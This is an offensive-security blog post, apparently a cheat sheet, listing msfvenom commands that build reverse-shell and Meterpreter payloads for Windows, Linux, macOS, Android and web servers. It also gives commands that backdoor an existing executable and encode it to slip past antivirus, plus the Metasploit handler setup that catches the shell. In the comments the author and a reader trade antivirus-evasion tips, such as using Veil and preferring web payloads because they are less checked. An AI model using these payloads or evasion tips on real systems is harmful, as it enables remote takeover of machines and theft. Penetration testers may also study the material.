
Msfvenom Cheat Sheet

The document is a cheat sheet for Msfvenom, a Metasploit payload generator, detailing various commands to create payloads for different operating systems including Windows, Linux, Mac, and Android. It includes examples of commands for generating TCP and HTTP payloads, as well as instructions for obtaining a Meterpreter shell. Additionally, there are comments discussing the effectiveness and issues with using Msfvenom on Windows 10, particularly regarding antivirus detection.

Lucian Nitescu Security Blog

Msfvenom Cheat Sheet


Jul 24, 2018 • cheatsheet, offensive_security

MsfVenom is Metasploit's standalone payload generator, a replacement for msfpayload and
msfencode.

Binaries

| Command | Info |
| --- | --- |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe | Creates a simple TCP Payload for Windows |
| msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe | Creates a simple HTTP Payload for Windows |
| msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf | Creates a simple TCP Shell for Linux |
| msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho | Creates a simple TCP Shell for Mac |
| msfvenom -p android/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk | Creates a simple TCP Payload for Android |

Web Payloads
| Command | Info |
| --- | --- |
| msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php | Creates a simple TCP Shell for PHP |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp | Creates a simple TCP Shell for ASP |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp | Creates a simple TCP Shell for Javascript |
| msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war | Creates a simple TCP Shell for WAR |

Windows Payloads
| Command | Info |
| --- | --- |
| msfvenom -l encoders | Lists all available encoders |
| msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe | Binds an exe with a Payload (Backdoors an exe) |
| msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe > example.exe | Creates a simple TCP payload with shikata_ga_nai encoder |
| msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe > example.exe | Binds an exe with a Payload and encodes it |

How do I get the meterpreter shell?

nli@nlistation:~$ sudo msfconsole


msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Comments
Zloobyvolf Zl • 6 days ago


Thanks but obsolete for Windows 10. MSE blocked ....:(

Barney Barnes • 8 months ago


This crap is all obsolete. Windows 10 blocks all msfvenom-generated executables now... you need to
update.

Lucian Ioan Nitescu Mod > Barney Barnes • 7 months ago


Then you are doing it wrong. Try harder. Also check this out: https://github.com/Veil-Fra...

Barney Barnes > Lucian Ioan Nitescu • 6 months ago


Lucian,
I have spent hours trying to install Veil-Evasion in the past on my kali box ... always to no
avail. Note that my box is a standard, completely up-to-date kali installation. Originally it was
kali 2018.3 but now updated to 2019.1. I have no problems running most other software and
I run a lot of packages ... from airodump-ng to hashcat to wifiphisher and many, many more.
They all installed and run seamlessly for the most part.

But after your response I decided to try again. This time I followed the git instructions to the
letter. But I must tell you the setup.py routine is a literal nightmare. It jumps all over the
place, intersperses error messages and gives you not a clue as to what needs to be done.
Yet it did install this time. So, I selected module #49 (ruby/meterpreter/new_tcp) and it
generated an executable which I immediately copied to my Windows box. But when I ran it:
"the file or folder is corruptible and unreadable"

Now I have spent a lot of time on other packages and gotten them to work, e.g. gophish,
free-radius, eclipse etc. I would appreciate it if you give me some suggestions?

Thanks,

Barney Barnes > Barney Barnes • 6 months ago


Another update: I have used ftp, http and gmail to try to transfer the veil-evasion-
generated exe. Ftp and http (vsftpd and apache servers) both state the file is
"corrupt". Gmail flat out says there is a virus contained in it. I have to believe that
either Defender or another AV on Win 10 is catching this stuff? I also used Wil
Allsopp's latest method on p. 124 of "Advanced Penetration Testing" ... same results.

Barney Barnes > Barney Barnes • 6 months ago


Ok, Lucian, I spent all afternoon testing each of your methods on this webpage and
this is the final result in the order in which they appear on this page:

The simple Windows payload was busted by Windows in every transfer method I
tried, including http and ftp.

The HTTP Payload was transferred successfully with my Python server but Defender
would not let it run.

I did not try the three Linux payloads as I'm only interested in Windows at this time.

Amazingly, the PHP Web Payload worked! Firefox on Windows loaded it and it
opened a meterpreter shell on Kali. I will pursue this further for sure.

I do not have server software for .asp, .jsp or .war but it would appear they also quite
possibly would work.

The three Windows Payloads:

The .exe/payload binder resulted in the following error message in msfvenom:



Lucian Ioan Nitescu Mod > Barney Barnes • 6 months ago


Hi man, are you doing a lab or something? Always use web payloads when you can
as generally they are not so well checked. Also, try to use the veil to generate the C
(as in C) payload and then use https://github.com/xoreaxea... to compile the C code.

Barney Barnes > Lucian Ioan Nitescu • 6 months ago


ok Lucian thanks,

I'll get back to you on this soon. Yes, I have a small lab. I also do a lot
of field work. I'm about an hour out of Los Angeles
